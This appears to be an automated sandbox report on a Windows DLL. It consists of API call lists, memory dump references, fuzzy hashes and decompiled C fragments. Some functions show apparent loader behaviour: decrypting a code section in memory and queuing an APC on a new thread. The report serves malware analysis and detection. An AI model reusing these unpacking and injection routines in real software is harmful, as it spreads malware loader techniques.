                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1ebc
                                                                                                                                                                                                                                                                    0x6e1f1ec4
                                                                                                                                                                                                                                                                    0x6e1f1ec4
                                                                                                                                                                                                                                                                    0x6e1f1ed0
                                                                                                                                                                                                                                                                    0x6e1f1ed0
                                                                                                                                                                                                                                                                    0x6e1f1e1a
                                                                                                                                                                                                                                                                    0x6e1f1e1b
                                                                                                                                                                                                                                                                    0x6e1f1e3b
                                                                                                                                                                                                                                                                    0x6e1f1e41
                                                                                                                                                                                                                                                                    0x6e1f1e43
                                                                                                                                                                                                                                                                    0x6e1f1e48
                                                                                                                                                                                                                                                                    0x6e1f1e84
                                                                                                                                                                                                                                                                    0x6e1f1e84
                                                                                                                                                                                                                                                                    0x6e1f1e4a
                                                                                                                                                                                                                                                                    0x6e1f1e52
                                                                                                                                                                                                                                                                    0x6e1f1e59
                                                                                                                                                                                                                                                                    0x6e1f1e63
                                                                                                                                                                                                                                                                    0x6e1f1e6f
                                                                                                                                                                                                                                                                    0x6e1f1e76
                                                                                                                                                                                                                                                                    0x6e1f1e7b
                                                                                                                                                                                                                                                                    0x6e1f1e80
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1e80
                                                                                                                                                                                                                                                                    0x6e1f1e7b
                                                                                                                                                                                                                                                                    0x6e1f1e48
                                                                                                                                                                                                                                                                    0x6e1f1e1b
                                                                                                                                                                                                                                                                    0x6e1f1edd

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(6E1F4188), ref: 6E1F1E26
                                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1F1E3B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: CreateThread.KERNELBASE ref: 6E1F1CBB
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1CD0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: GetLastError.KERNEL32(00000000), ref: 6E1F1CDB
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F1CE5
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: CloseHandle.KERNEL32(00000000), ref: 6E1F1CEC
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1CA4: SetLastError.KERNEL32(00000000), ref: 6E1F1CF5
                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(6E1F4188), ref: 6E1F1E8E
                                                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E1F1EA8
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 6E1F1EC4
                                                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 6E1F1ED0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                                                    • Opcode ID: ab05ee6c0a839d323511b5c36207824ea6bba087649962825879c5fb6501bd90
                                                                                                                                                                                                                                                                    • Instruction ID: 551350bd531e1a2d0194a8323344ff5a369e529fe6c73bae15d3f4b2d566beb7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab05ee6c0a839d323511b5c36207824ea6bba087649962825879c5fb6501bd90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21C9B1B04605EFDB41CFD9DD5894A77E8F7663607508425E506D3142D3309987BBD0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F1CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1f41cc, 0, _a12); // executed
                                                                                                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                    0x6e1f1cbb
                                                                                                                                                                                                                                                                    0x6e1f1cc1
                                                                                                                                                                                                                                                                    0x6e1f1cc5
                                                                                                                                                                                                                                                                    0x6e1f1cd0
                                                                                                                                                                                                                                                                    0x6e1f1cd8
                                                                                                                                                                                                                                                                    0x6e1f1ce1
                                                                                                                                                                                                                                                                    0x6e1f1ce5
                                                                                                                                                                                                                                                                    0x6e1f1cec
                                                                                                                                                                                                                                                                    0x6e1f1cf3
                                                                                                                                                                                                                                                                    0x6e1f1cf5
                                                                                                                                                                                                                                                                    0x6e1f1cfb
                                                                                                                                                                                                                                                                    0x6e1f1cd8
                                                                                                                                                                                                                                                                    0x6e1f1cff

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE ref: 6E1F1CBB
                                                                                                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1CD0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6E1F1CDB
                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F1CE5
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E1F1CEC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6E1F1CF5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                                                                                                    • Opcode ID: b3752b95b14f5266fb0ddb999038e68682290afff15a99d6490e2585fc295bc2
                                                                                                                                                                                                                                                                    • Instruction ID: 39d0650554949e56baa319c98599fd3300d8f055ce89a408ba358af6c07601f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3752b95b14f5266fb0ddb999038e68682290afff15a99d6490e2585fc295bc2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F01276205E21BBDB125BA0AC0CF5F7FE9FB0A751F008405F60791151C7218817BBEA
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                    • Opcode ID: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction ID: 4d765f2ace651ee4fdc93cee81dca30f388468670c158b5a3736813278213ce8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266bd8c67d8b8a25e08ebad9d8d9fef55d4240af36dd71951b5b26b7bbd76e98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC215EF190163EEBDF654A95CC40EAF3B7BDB85B95B214625FC145B690C7308E428FA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E237387
                                                                                                                                                                                                                                                                      • Part of subcall function 6E237BA4: RtlInitializeSListHead.NTDLL(6E27C780), ref: 6E237BA9
                                                                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2373F1
                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 6E23743B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 2097537958-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction ID: 15b2e55c67bfbeb6cadb9e5c293cfe59c448b8e5c825cbb3d2de61b1e9396fe4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faf5295c1622196ac71b576df67fcae0100edd1d96b8c6bd83ab9e8e9e1e7280
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021ACBA50423FDBDF04ABF498197DE7B775B0672AF304859D9456A2C0CF611051CE61
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                    			E6E1F15A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t77 =  *0x6e1f41b0;
                                                                                                                                                                                                                                                                    				_t39 = E6E1F1A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                                                                                    							_t47 =  *0x6e1f41cc;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                                    							_t11 = _t66 + 0x6e1f5137; // 0x6e1f5137
                                                                                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                                                                                    								E6E1F1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                                                                                    								 *0x6e1f41cc = _t47;
                                                                                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                    0x6e1f15aa
                                                                                                                                                                                                                                                                    0x6e1f15ba
                                                                                                                                                                                                                                                                    0x6e1f15c1
                                                                                                                                                                                                                                                                    0x6e1f15c4
                                                                                                                                                                                                                                                                    0x6e1f15d9
                                                                                                                                                                                                                                                                    0x6e1f15e0
                                                                                                                                                                                                                                                                    0x6e1f15e5
                                                                                                                                                                                                                                                                    0x6e1f15f6
                                                                                                                                                                                                                                                                    0x6e1f15f9
                                                                                                                                                                                                                                                                    0x6e1f1601
                                                                                                                                                                                                                                                                    0x6e1f1604
                                                                                                                                                                                                                                                                    0x6e1f16ae
                                                                                                                                                                                                                                                                    0x6e1f160a
                                                                                                                                                                                                                                                                    0x6e1f160a
                                                                                                                                                                                                                                                                    0x6e1f160e
                                                                                                                                                                                                                                                                    0x6e1f1676
                                                                                                                                                                                                                                                                    0x6e1f1610
                                                                                                                                                                                                                                                                    0x6e1f1610
                                                                                                                                                                                                                                                                    0x6e1f1613
                                                                                                                                                                                                                                                                    0x6e1f1615
                                                                                                                                                                                                                                                                    0x6e1f161d
                                                                                                                                                                                                                                                                    0x6e1f1620
                                                                                                                                                                                                                                                                    0x6e1f1623
                                                                                                                                                                                                                                                                    0x6e1f162b
                                                                                                                                                                                                                                                                    0x6e1f1633
                                                                                                                                                                                                                                                                    0x6e1f1634
                                                                                                                                                                                                                                                                    0x6e1f1635
                                                                                                                                                                                                                                                                    0x6e1f163c
                                                                                                                                                                                                                                                                    0x6e1f163c
                                                                                                                                                                                                                                                                    0x6e1f1650
                                                                                                                                                                                                                                                                    0x6e1f1655
                                                                                                                                                                                                                                                                    0x6e1f165e
                                                                                                                                                                                                                                                                    0x6e1f1665
                                                                                                                                                                                                                                                                    0x6e1f1668
                                                                                                                                                                                                                                                                    0x6e1f166c
                                                                                                                                                                                                                                                                    0x6e1f1671
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1628
                                                                                                                                                                                                                                                                    0x6e1f1628
                                                                                                                                                                                                                                                                    0x6e1f1673
                                                                                                                                                                                                                                                                    0x6e1f1680
                                                                                                                                                                                                                                                                    0x6e1f1695
                                                                                                                                                                                                                                                                    0x6e1f1682
                                                                                                                                                                                                                                                                    0x6e1f168b
                                                                                                                                                                                                                                                                    0x6e1f1690
                                                                                                                                                                                                                                                                    0x6e1f16a6
                                                                                                                                                                                                                                                                    0x6e1f16a6
                                                                                                                                                                                                                                                                    0x6e1f16b5
                                                                                                                                                                                                                                                                    0x6e1f16bb

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1F15F9
                                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1F17EC), ref: 6E1F168B
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1F16A6
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                                    • String ID: Mar 26 2021
                                                                                                                                                                                                                                                                    • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                                    • Opcode ID: 569e4d848761ca8dfcabd28b608a9150eaab1c6382a2d370cdd6dd616d9b96f0
                                                                                                                                                                                                                                                                    • Instruction ID: f463ba425cfb60c688d33088a2ca82216d85ec63d7aeeebcd2d6bc4c744765c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 569e4d848761ca8dfcabd28b608a9150eaab1c6382a2d370cdd6dd616d9b96f0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99315EB1E00609EFDF00CF99D880ADEBBF9BF49314F148129E515A7246D771AA4A9FD0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                    			E6E1F1D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t4 = E6E1F17A7(_a4); // executed
                                                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                    0x6e1f1d3b
                                                                                                                                                                                                                                                                    0x6e1f1d40
                                                                                                                                                                                                                                                                    0x6e1f1d4e
                                                                                                                                                                                                                                                                    0x6e1f1d53
                                                                                                                                                                                                                                                                    0x6e1f1d53
                                                                                                                                                                                                                                                                    0x6e1f1d59
                                                                                                                                                                                                                                                                    0x6e1f1d5e
                                                                                                                                                                                                                                                                    0x6e1f1d62
                                                                                                                                                                                                                                                                    0x6e1f1d66
                                                                                                                                                                                                                                                                    0x6e1f1d66
                                                                                                                                                                                                                                                                    0x6e1f1d70
                                                                                                                                                                                                                                                                    0x6e1f1d79

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6E1F1D35
                                                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1F1D40
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1F1D53
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1F1D66
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                                                    • Opcode ID: 39d0ba6790eec0f05bb1ec29aa3947343bf7ce9f1e54242c8ec98b9857aa8c0f
                                                                                                                                                                                                                                                                    • Instruction ID: ce32353f7b82a2193724d1d1d53c8a69ac4208049f133b9aaf19e9e452ba625d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39d0ba6790eec0f05bb1ec29aa3947343bf7ce9f1e54242c8ec98b9857aa8c0f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E022B1305710AB93022A694C8CEAFABECDFD23317110336F526D21D0CB508C4BA9E2
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2414B8: GetOEMCP.KERNEL32(00000000,6E24172A,6E2435A7,00000000,?,?,00000000,?,6E2435A7), ref: 6E2414E3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E241787
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f9e6ff8fcb290419b9acf985d429e188ccadcccd0a966ad08bda6fee2c656cb
                                                                                                                                                                                                                                                                    • Instruction ID: 5830b2e556fe1d8b16d1789161e6ce9cc7aa6d77a236c942684046949a534a97
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f9e6ff8fcb290419b9acf985d429e188ccadcccd0a966ad08bda6fee2c656cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31B27580424EEFDB05CFA8D880BDE7BF6BF44315F110565E9149B290EB7299A8CF50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2335B3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction ID: 5bde274960abf5af74021a377907620d7e60472df33b0653907b0a4a438c3875
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9239825f99d2cbf352a5f025acb91148603ca9e2c73b8d2b5b129fc9dc4f70d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71D2719005798FCF14CF6DC498AA97BE7BB46321F24825AE494C7381E2B59A0CDFA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,6E270094), ref: 6E23D6F6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9af5c0befce1c225c94830b2abaaa3330a6b4bd749b37bb9bed7aad717bcd01a
                                                                                                                                                                                                                                                                    • Instruction ID: e4b214df87d952cca86bc01f954a22648547ebe8cf78695b641d2f365fb29c70
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9af5c0befce1c225c94830b2abaaa3330a6b4bd749b37bb9bed7aad717bcd01a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E0A0A624063FABEA511AE69C15F8B674FAB42BA1F710111E839A60C0CB20C8418EA1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E24297E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456CE
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456E0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456F2
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245704
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245716
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245728
